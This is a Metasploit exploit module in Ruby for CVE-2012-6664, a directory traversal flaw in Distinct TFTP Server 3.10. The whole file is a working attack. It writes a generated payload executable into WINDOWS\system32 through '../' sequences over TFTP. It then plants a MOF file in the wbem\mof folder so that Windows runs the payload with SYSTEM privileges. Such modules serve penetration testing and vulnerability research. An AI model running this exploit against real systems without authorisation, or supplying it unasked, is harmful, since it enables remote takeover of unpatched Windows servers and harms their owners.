##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Rex::Proto::TFTP
  include Msf::Exploit::EXE
  include Msf::Exploit::WbemExec
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution',
        'Description' => %q{
          This module exploits a directory traversal vulnerability in the TFTP
          Server component of Distinct Intranet Servers version 3.10 which
          allows a remote attacker to write arbitrary files to the server file
          system, resulting in code execution under the context of 'SYSTEM'.
          This module has been tested successfully on TFTP Server version 3.10
          on Windows XP SP3 (EN).
        },
        'License' => MSF_LICENSE,
        'Author' =>
          [
            'modpr0be', # Initial discovery, PoC (Tom Gregory)
            'sinn3r' # Metasploit
          ],
        'References' =>
          [
            ['OSVDB', '80984'],
            ['EDB', '18718'],
            ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'],
            ['CVE', '2012-6664']
          ],
        'Payload' =>
          {
            'BadChars' => "\x00"
          },
        'DefaultOptions' =>
          {
            'EXITFUNC' => 'thread'
          },
        'Platform' => 'win',
        'Targets' =>
          [
            ['Automatic', { 'auto' => true }],
          ],
        'Privileged' => true,
        'DisclosureDate' => '2012-04-08',
        'DefaultTarget' => 0
      )
    )

    register_options([
      OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]),
      OptAddress.new('RHOST', [true, 'The remote TFTP server address']),
      OptPort.new('RPORT', [true, 'The remote TFTP server port', 69])
    ])
  end

  def upload(filename, data)
    tftp_client = Rex::Proto::TFTP::Client.new(
      'LocalHost' => '0.0.0.0',
      'LocalPort' => 1025 + rand(0xffff - 1025),
      'PeerHost' => datastore['RHOST'],
      'PeerPort' => datastore['RPORT'],
      'LocalFile' => "DATA:#{data}",
      'RemoteFile' => filename,
      'Mode' => 'octet',
      'Context' => { 'Msf' => framework, 'MsfExploit' => self },
      'Action' => :upload
    )

    tftp_client.send_write_request { |msg| print_status(msg) }
    until tftp_client.complete
      select(nil, nil, nil, 1)
      tftp_client.stop
    end
  end

  def exploit
    exe_name = "#{rand_text_alpha(8..15)}.exe"
    exe = generate_payload_exe
    mof_name = "#{rand_text_alpha(8..15)}.mof"
    mof = generate_mof(mof_name, exe_name)
    traversal = '../' * datastore['DEPTH'].to_i

    print_status("Sending EXE (#{exe.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe)
    register_file_for_cleanup(exe_name)

    # Let the TFTP server idle a bit before sending another file
    select(nil, nil, nil, 3)

    print_status("Sending MOF (#{mof.length} bytes)")
    upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
    register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
  end
end
